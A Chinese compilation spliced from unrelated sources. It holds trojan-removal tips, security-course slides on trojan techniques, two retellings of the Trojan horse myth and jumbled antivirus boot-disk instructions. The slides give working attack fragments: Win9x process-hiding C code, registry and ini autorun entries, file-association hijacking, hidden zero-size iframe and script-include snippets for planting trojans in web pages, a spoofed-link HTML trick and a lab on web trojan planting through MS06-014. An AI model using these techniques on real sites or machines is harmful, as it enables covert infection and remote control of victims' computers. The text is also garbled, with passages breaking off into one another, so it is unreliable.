特洛伊密码攻防办法5.观察⽬录.普通⽤户应当经常观察位于c:\、c:\windows、c:\windows\system这三个⽬录下的⽂件.⽤“记事本”逐⼀打开c:\下的⾮执⾏类⽂件(除exe、bat、com以外的⽂件),查看是否发现特洛伊⽊马、击键程序的记录⽂件,在c:\Windows或c:\Windows\system下如果有光有⽂件名没有图标的可执⾏程序,你应该把它们删除,然后再⽤杀毒软件进⾏认真的清理. 特洛伊密码攻防办法6.在删除⽊马之前,最最重要的⼀项⼯作是备份,需要备份注册表,防⽌系统崩溃,备份你认为是⽊马的⽂件,如果不是⽊马就可以恢复,如果是⽊马你就可以对⽊马进⾏分析.不同的不马有不同的清除⽅法,由于涉及⾯太⼤,这⾥就不详述了. 总之不管你喜欢不喜欢,⽊马总是存在的,你只有去多多少少的了解⼀些⽊马的知识,才不⾄于遭⼈暗算,警惕啊,我的朋友,在茫茫的⼤海中,总有那麽⼀双眼睛在窥视着你.。

(7)特洛伊木马及防范技术

信息安全研究中心
反弹端口
反弹端口型木马分析了防火墙的特性后发现: 防火墙对于连入的链接往往会进行非常严格的过 滤,但是对于连出的链接却疏于防范。于是,与 一般的木马相反,反弹端口型木马的服务端(被 控制端)使用主动端口,客户端(控制端)使用 被动端口,木马定时监测控制端的存在,发现 控 制端上线立即弹出端口主动连结控制端打开的主 动端口,为了隐蔽起见,控制端的被动端口一般 开在80,这样,即使用户使用端口扫描软件检查 自己的端口,发现的也是类似 TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情况,稍微疏 忽一点你就会以为是自己在浏览网页。

信息安全研究中心
木马的一般入侵过程
• 制造木马 设计、编码、配置 • 传播安装 浏览网页、下载软件、上网聊天、发送邮件 • 启动木马 自动启动、关联启动、驱动木马、dll木马 • 建立链接 固定端口、可变端口、反弹端口、ICMP • 远程控制 远程监控、文件操作、系统修改
信息安全研究中心
特洛依木马及防范技术
信息安全研究中心
通讯技术
• 寄生端口(重用端口):将木马的通信连接绑定在通用 端口上(比如80),通过这些服务端口发送信息。因为 木马实际上是寄生在已有的系统服务之上的,因此,扫 描或查看系统端口的时候是没有任何异常的。 反弹端口(反向连接):反弹端口型木马的服务端(被 控制端)使用主动端口,客户端(控制端)使用被动端 口,木马定时监测控制端的存在,发现 控制端上线立即 弹出端口主动连结控制端打开的主动端口。 不用端口:使用ICMP协议进行通讯。由于ICMP报文由 系统内核或进程直接处理因而不通过端口传递数据。
信息安全研究中心
特洛伊木马
木马又称特洛伊木马(trojan horse),它是一种远程控制类黑 客工具。木马的运行模式属于C/S模式,它包括两大部分,即客户端 和服务端。其原理是一台主机提供服务(服务器),另一台主机接受服 务(客户机),作为服务器的主机一般会打开一个默认的端口进行监听。 如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程 序就会自动运行,来应答客户机的请求。

特洛伊的故事木马计_特洛伊木马计神话故事

特洛伊的故事木马计_特洛伊木马计神话故事《木马计》,古希腊神话故事。

是《特洛伊的故事》中的第五十三个篇章。

这个是史上著名的战略之一!这个计策使得久攻不下的特洛伊城一夜之间崩塌!下面跟小编来看看特洛伊的故事木马计,希望能帮到大家!特洛伊的故事木马计希腊人围攻特洛伊城,久久不能得手。

于是,占卜家和预言家卡尔卡斯召集会议,他说:"你们用这种办法攻城是没有用的。

听着,我昨天看到一个预兆:一只雄鹰追逐一只鸽子。

鸽子飞进岩缝里躲了起来。

雄鹰在山岩旁等了许久,鸽子就是不出来。

雄鹰便躲在附近的灌木丛中。

这只蠢鸽子飞了出来。

雄鹰立即扑上去,用利爪抓住了它。

我们应该以这只雄鹰为榜样。

对特洛伊城不能强攻,而应智取。

"他说完后,英雄们绞尽脑汁,要想出一个计谋来尽快结束这场可怕的,但他们想不出来。

最后,奥德修斯想出一个妙计。

"朋友们,你们知道怎么办吗?"说着,他禁不住提高了声音,"让我们造一个巨大的木马,让马腹里尽可能地隐藏足够多的希腊人。

其余的人则乘船离开特洛伊海岸,撤退到忒涅多斯岛。

在出发前必须把军营彻底烧毁,让特洛伊人在城墙上看见烟火,不存戒备,大胆地出城活动。

同时我们让一个特洛伊人不认识的士兵,冒充逃难的人混进城去,告诉他们说,希腊人为了撤退,准备把他杀死献祭神衹,但他设法逃脱了。

他还要说,希腊人造了一个巨大的木马,献给特洛伊人的敌人帕拉斯·雅典娜,他自己就是躲在马腹下面,等到敌人撤退后才偷偷地爬出来的。

这位士兵必须能对特洛伊人复述这个故事,并要说得实有其事,使特洛伊人不致怀疑。

特洛伊人一定会同情这个可怜的外乡人,将他带进城去。

在那里,他设法说动特洛伊人把木马拖进城内。

当我们的敌人熟睡时,他将给我们发出预定的暗号。

这时,躲藏在木马里的人赶快爬出来,并点燃火把召唤隐蔽在忒涅多斯岛附近的战士们。

这样,我们就能用剑与火一举摧毁特洛伊城。

"奥德修斯说出了他的计策,大家都惊叹他的妙计。

特洛伊木马

欢迎使用瑞星杀毒软件-Linux启动杀毒盘制作工具。通过该工具能够帮助您制作一张带有瑞星杀病毒软件的Linux启动盘,您可以用它启动计算机并查杀病毒。具体功能如下:
1.格式化您的U盘(FAT16),重写U盘的主引导记录和DPT以便能够支持Linux引导(此过程会删除U盘上现有的所有数据,请您事先对它,重启电脑,进入BIOS设置程序,把USB-FDD设置为电脑启动顺序的第一位,然后保存退出,这时电脑会进入DOS状态,然后在DOS提示符下输入"kvd2003"后回车即可进入DOS下的杀毒程序,使用图形化的界面即可轻松完成杀毒。
强烈建议您在使用之前仔细阅读本说明!
区别便是对计算机用户所带来的后果不同
制作DOS杀毒盘
在这里选择了江民杀毒软件来制作DOS杀毒盘,首先是要把DOS杀毒盘所需要的文件制作出来,制作DOS杀毒盘是要需要软驱的,但没有软驱,所以我们可以使用"SUBST"虚拟一个软驱出来。具体的操作是:先新建一个文件夹,例如在C:盘下新建KV的文件夹,然后在"开始-程序-附件"中运行"命令提示符"后,进入C:盘根目录,输入"subst a: KV"后回车即可完成。
2.将Linux启动所必须的核心文件以及瑞星最新的病毒库复制到U盘。
3.制作好的U盘可以直接以Linux环境启动计算机并查杀病毒(请确保您的计算机主板支持USB ZIP方式启动)。

除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。

特洛伊木马的故事 特洛伊木马计是什么

精心整理
特洛伊木马的故事特洛伊木马计是什么
大约在公元前13世纪,希腊人和特洛伊人之间发生了一场战争。

希腊人联合起来攻打特洛伊城,但特洛伊城是个十分坚固的城市,希腊人攻打了9年也没有打下来。

第10年的一天早晨,希腊联军的战舰突然扬帆离去,平时喧闹的战场变得寂静无声。

特洛伊人以为希腊人撤军回国了,他们跑到城外,发现海滩上留有一个
从此,“当心希腊人造的礼物”这一名言在世界各地流传开来,它提醒人们要警惕和防止被对手钻进自己的心脏。

“特洛伊木马”成了“挖心战”的同义语,比喻打进对手心脏的战术。

所以,有人将那些会将自己伪装成某种应用程序来吸引使用者下载或执行,并进而破坏使用者电脑资料或窃取其他信息的程序,成为“特洛伊木马”病毒。

精心整理
---来源网络,仅供分享学习2/2。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
• • • • • • • • • • • • • • • • • • • • // Win9x隐藏技术 DWORD dwVersion = GetVersion(); // 得到操作系统的版本号 if (dwVersion >= 0x80000000) // 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD); //定义RegisterServiceProcess() 函数的原型 HINSTANCE hDLL; LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; hDLL = LoadLibrary("KERNEL32.dll"); //加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL lpRegisterServiceProcess =(LPREGISTERSERVICEPROCESS)GetProcAddress( hDLL,"RegisterServiceProcess"); //得到RegisterServiceProcess()函数的地址 lpRegisterServiceProcess(GetCurrentProcessId(),1); //执行RegisterServiceProcess()函数,隐藏本进程 FreeLibrary(hDLL); //卸载动态链接库 }
信息安全工程学院
2.修改系统配置
• win.ini文件中的启动加载项:[windwos]段中有如下加 载项:
• run= • Load= • system.ini中的启动加载项:在[BOOT]子项中的 “Shell‖项:
• shell=
信息安全工程学院
3 修改注册表
• HKEY_CLASSES_ROOT:此处存储的信息可以确保当使用Windows 资源管理器打开文件时,将使用正确的应用程序打开对应的文件类型。 • HKEY_CURRENT_USER:存放当前登录用户的有关信息。用户文件 夹、屏幕颜色和“控制面板”设置存储在此处。该信息被称为用户配置 文件。 • HKEY_LOCAL_MACHINE:包含针对该计算机(对于任何用户)的配 置信息。 • HKEY_USERS:存放计算机上所有用户的配置文件。 • HKEY_CURRENT_CONFIG:包含本地计算机在系统启动时所用的硬 件配置文件信息。 • HKEY_DYN_DATA:记录系统运行时刻的状态。
信息安全工程学院
第一步:检测一下是否存在该漏洞
信息安全工程学院
第二步:准备个简单的木马
该程序是个可执行程序,它要被挂到网站上,等 着别人来上钩。
其功能是:执行后把自己改名字并存储到 System32下;修改注册表,实现自加载。
信息安全工程学院
第三步:核心程序
信息安全工程学院
第四步:进一步伪装
• 选择文件格式中的“打开”、“编辑”、“打印”项 目。
• 例如冰河木马病毒
• [HKEY_CLASSES_ROOT\txtfile\shell\open\com mand]中的键值 “c:\windows\notepad.exe %1‖, 改为“sysexplr.exe %1‖。
信息安全工程学院
4.借助自动运行功能
服务应答 sendto( ) readfrom( )
close( )
close( )
无连接套接应用程序时序图
信息安全工程学院
服务器
socket( )
bind( ) listen( )
客户机
accept( )
阻塞,等待客户数据
socket( )
建立连接
connect( )
请求数据
read( )
处理服务请求 应答数据
信息安全工程学院
[实验目的]
通过该实验掌握网站挂马的方法。 [实验环境] Windows 2000 Professional SP4 IIS 5.x
IE 5.x
[实验素材]
附书资源目录 experimemt\ms06014
信息安全工程学院
实验准备
如图,把这些文件用IIS发布。其中WriteReg.exe可以不 发布。WriteReg.exe和WriteReg.pdf内容完全一致,只是 扩展名不同而已。这样做的目的是更加便于隐藏。
信息安全工程学院
网页挂马实验(实验六)
该挂马方法利用了MS06-014漏洞。
该漏洞是Windows的RDS.Dataspace ActiveX实 现上存在漏洞,远程攻击者可能利用此漏洞在获 取主机的控制。 在某些情况下,MDAC所捆绑的RDS.Dataspace ActiveX控件无法确保能够进行安全的交互,导 致远程代码执行漏洞,成功利用这个漏洞的攻击 者可以完全控制受影响的系统。
7.通过浏览网页启动
• 利用MIME的漏洞。
8.利用Java applet等网络编程语言启动
信息安全工程学院
9.利用系统自动运行的程序
• 例如,ScanDisk等程序,在一定情况下,系统会自动 启动它们。
10. 由其他进程引导
• 例如,采用远程线程插入技术的木马,当宿主程序的 进程启动时,木马就以线程的方式插入其中自动运行。
原理:当用户打开/test.htm时,显示 给用户的是/test.jpg,而 /test.htm网页代码也随之运行。
信息安全工程学院
网络钓鱼挂马
网络中最常见的欺骗手段,黑客们利用人们的猎 奇、贪心等心理伪装构造一个链接或者一个网页, 利用社会工程学欺骗方法,引诱点击,当用户打 开一个看似正常的页面时,网页代码随之运行, 隐蔽性极高。
信息安全工程学院
网页挂马的关键技术
框架挂马
js挂马 图片伪装挂马 网络钓鱼挂马 伪装挂马
信息安全工程学院
框架挂马
攻击者利用iframe语句,加载到任意网页中。是 最早也是最有效的的一种网络挂马技术。
代码如下:
• <iframe. src=/muma.html width=0 height=0></iframe>
原理:在打开插入该句代码的网页后,也就打开 了/muma.html页面,但是由 于它的长和宽都为“0‖,所以很难察觉,非常具 有隐蔽性。
信息安全工程学院
js挂马
利用js脚本调用进行的网页挂马技术。攻击者先 制作一个.js文件,然后利用js代码调用到挂马的 网页。
存在两种网页挂马方式: 传统的直接挂马和新的 间接挂马方式。
信息安全工程学院
传统方式
黑客直接在被 入侵网站上挂 马。影响群体 为直接访问这 个网站的用户。
信息安全工程学院
网页挂马的新方式
被挂马网站是 第三方知名 ―统计网站‖编 写的用于收集 统计用户浏览 网页数据信息 的代码。黑客 正是利用了这 些统计网站进 行挂马,从而 使得所有使用 了该统计代码 的网站全部都 被间接挂马。
代码如下:
• <script. language=javascript. src=/gm.js></script>
原理:/gm.js就是一个js脚本 文件,通过它调用和执行木马的服务端。这些js 文件一般都可以通过工具生成,攻击者只需输入 相关的选项就可以了。
信息安全工程学院
木马的关键技术
——通信技术
信息安全工程学院
Socket技术
客户机
请求
服务器
进程通讯 设施
请求
响应 响应
信息安全工程学院
服务器 客户机 socket( ) socket( ) bind( ) readfrom( )服务请求 sendto( )
处理服务请求
信息安全工程学院
U盘植入:木马先寄宿在计算机或U盘上。当U盘 和计算机连接时,相互传播。该方法利用了U盘 介质的移动性。
程序绑定:传播木马的最佳途径之一。把木马和 常用的共享软件绑定在一起,当用户下载了免费 共享软件并安装或使用时,木马就种植到其计算 机上。
信息安全工程学院
网站挂马
网页挂马就是攻击者通过在正常的页面中(通常 是网站的主页)插入一段代码。浏览者在打开该 页面的时候,这段代码被执行,然后下载并运行 某木马的服务器端程序,进而控制浏览者的主机。
信息安全工程学院
伪装挂马
高级欺骗,黑客利用IE或者Fixfox浏览器的设计 缺陷制造的一种高级欺骗技术,当用户访问木马 页面时地址栏显示或者 等用户信任地址,其实却 打开了被挂马的页面,从而实现欺骗。
代码如下(在貌似的链接上 点击却打开了):
信息安全工程学院
<p><a id="qipian" href=""></a></p> <div> <a href="" target="_blank"> <table> <caption> <label for="qipian"> <u style="cursor;pointer;color;blue"> IT168安全版块 </u> </label> </caption> </table> </a> </div>
木马的关键技术
信息安全工程学院
木马的关键技术
木马植入技术
木马自加载技术 木马通信技术 木马隐藏技术 其他关键技术
信息安全工程学院
木马的关键技术
——植入技术
信息安全工程学院
植入技术
升级植入:打补丁是目前内核及功能升级重要途 径。由于升级包发布途径不严格且非常复杂,因 此,这将成为传播木马的一个有效途径。 网站(网页)植入:网站挂马是传播木马的最佳 途径之一。把木马连接潜入到网站上,当用户访 问该网站时,把木马自动种植到用户的计算机上。 在辅助以附加手段的前提下,该方法也可以实现 定点植入。 漏洞植入:木马通过操作系统的漏洞直接传播给 计算机,其中间桥梁是诸如局域网、Internet、 WiFi、蓝牙、红外等网络连接。